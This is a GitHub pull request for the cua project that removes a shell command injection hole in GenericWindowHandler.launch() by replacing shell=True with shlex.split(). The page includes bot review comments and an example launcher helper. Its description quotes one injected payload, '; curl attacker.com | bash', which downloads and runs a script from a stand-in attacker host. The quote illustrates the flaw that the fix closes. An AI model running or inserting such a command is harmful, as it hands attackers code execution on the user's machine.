fix: prevent command injection in GenericWindowHandler.launch() #1146

Open
jnMetaCode wants to merge 2 commits into trycua:main from jnMetaCode:fix/command-injection-launch

@jnMetaCode jnMetaCode commented Mar 7, 2026

Summary

GenericWindowHandler.launch() passes the app parameter directly to subprocess.Popen() with shell=True when no args are provided. This allows command injection if the app value comes from an untrusted source (e.g. agent instructions from web content).

Before:

proc = subprocess.Popen(app, shell=True)

After:

proc = subprocess.Popen(shlex.split(app))

shlex.split() safely tokenizes shell-like strings (e.g. "libreoffice --writer" → ["libreoffice", "--writer"]) without invoking a shell, so commands like "; curl attacker.com | bash" are no longer interpreted.

Related issue

Fixes #1097

Changes

  • Added import shlex to generic.py
  • Replaced subprocess.Popen(app, shell=True) with subprocess.Popen(shlex.split(app))

Summary by CodeRabbit

Bug Fixes

  • Improved command execution handling to strengthen system reliability, stability, and security posture across multiple operational environments.
  • Enhanced robustness ensures more consistent and predictable behavior in diverse deployment and usage scenarios.
  • All existing functionality and user-facing features remain completely unchanged; zero impact on current workflows or commands.

Use shlex.split() to safely parse app strings instead of passing them
to subprocess.Popen with shell=True, which allows arbitrary command
injection when the app parameter is attacker-controlled.

Fixes trycua#1097

vercel Bot commented Mar 7, 2026

@jnMetaCode is attempting to deploy a commit to the Cua Team on Vercel.

A member of the Team first needs to authorize it.


coderabbitai Bot commented Mar 7, 2026

Important

Review skipped

Auto incremental reviews are disabled on this repository.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 1dd793ca-cf94-423f-be2b-72a039393001

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Walkthrough

A command injection vulnerability in GenericWindowHandler.launch() is fixed by replacing shell=True with shlex.split() for safe command parsing, preventing arbitrary shell command execution when the app parameter is untrusted.

Changes

| Cohort / File(s) | Summary |
| --- | --- |
| Security Fix: libs/python/computer-server/computer_server/handlers/generic.py | Added shlex import and replaced subprocess.Popen(app, shell=True) with subprocess.Popen(shlex.split(app)) to prevent OS command injection (CWE-78). No behavior change for argument-passing path. |

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

Poem

🐰 A rabbit hops through code so tight,
With shlex.split, commands are right,
No shell injection tricks shall pass,
Security's our hopping glass! ✨

🚥 Pre-merge checks | ✅ 4 | ❌ 1

❌ Failed checks (1 warning)

| Check name | Status | Explanation | Resolution |
| --- | --- | --- | --- |
| Docstring Coverage | ⚠️ Warning | Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%. | Write docstrings for the functions missing them to satisfy the coverage threshold. |
✅ Passed checks (4 passed)
| Check name | Status | Explanation |
| --- | --- | --- |
| Description Check | ✅ Passed | Check skipped - CodeRabbit’s high-level summary is enabled. |
| Title check | ✅ Passed | The title 'fix: prevent command injection in GenericWindowHandler.launch()' is clear, specific, and accurately summarizes the main change - addressing a security vulnerability by eliminating shell=True usage. |
| Linked Issues check | ✅ Passed | The PR successfully implements all coding requirements from issue #1097: imports shlex, replaces subprocess.Popen(app, shell=True) with shlex.split(app), and prevents command injection vulnerability. |
| Out of Scope Changes check | ✅ Passed | All changes are in-scope: importing shlex and modifying the launch method in generic.py directly address the command injection vulnerability specified in #1097 without introducing unrelated changes. |

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@libs/python/computer-server/computer_server/handlers/generic.py`:
- Around line 116-117: The current launch in generic.py uses shlex.split(app)
which forces POSIX tokenization and breaks Windows paths; modify the subprocess
invocation in the handler so it chooses parsing by platform: on Windows (e.g.,
sys.platform.startswith("win") or os.name == "nt") call subprocess.Popen(app)
with the string (no shell=True) so CreateProcess handles Windows
quoting/backslashes, and on POSIX use subprocess.Popen(shlex.split(app)) to
safely tokenize; keep the intent to avoid shell=True to prevent command
injection and update the code paths around proc/subprocess.Popen accordingly.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 3fe9a057-0bc6-40ad-9fe7-dda2b79e5b5d

📥 Commits

Reviewing files that changed from the base of the PR and between 65f9701 and 41e9186.

📒 Files selected for processing (1)
  • libs/python/computer-server/computer_server/handlers/generic.py

Comment thread libs/python/computer-server/computer_server/handlers/generic.py Outdated
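
An added example (not code from this PR or from the cua repository) that combines the shlex.split() change from the PR description with the per-platform handling suggested in the review comment above. The names build_command and launch are hypothetical, and the sample strings used with it are constructed.

```python
import shlex
import subprocess
import sys


def build_command(app: str, platform: str = sys.platform):
    """Return the value to hand to subprocess.Popen without shell=True.

    Hypothetical helper: a list of argv tokens on POSIX, the unchanged
    string on Windows (the split proposed in the review comment).
    """
    if not isinstance(app, str) or not app.strip():
        raise ValueError("empty app string")
    if "\x00" in app:
        raise ValueError("NUL byte in app string")
    if platform.startswith("win"):
        # Passing the string lets CreateProcess apply Windows quoting rules,
        # so backslashes in paths are not consumed by POSIX tokenization.
        return app
    # POSIX: tokenize with shell-like quoting rules but never start a shell.
    # shlex.split() raises ValueError on unbalanced quotes.
    argv = shlex.split(app)
    if not argv or not argv[0]:
        raise ValueError("no executable in app string")
    return argv


def launch(app: str) -> subprocess.Popen:
    # shell defaults to False: argv[0] is executed directly, so ';', '|',
    # '$(...)' and backticks reach the program as literal arguments.
    return subprocess.Popen(build_command(app))
```

Tokenizing removes shell interpretation only; the caller still decides which executable runs and with which arguments.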
Development

Successfully merging this pull request may close these issues.

[Security] Command Injection in GenericWindowHandler.launch() via shell=True
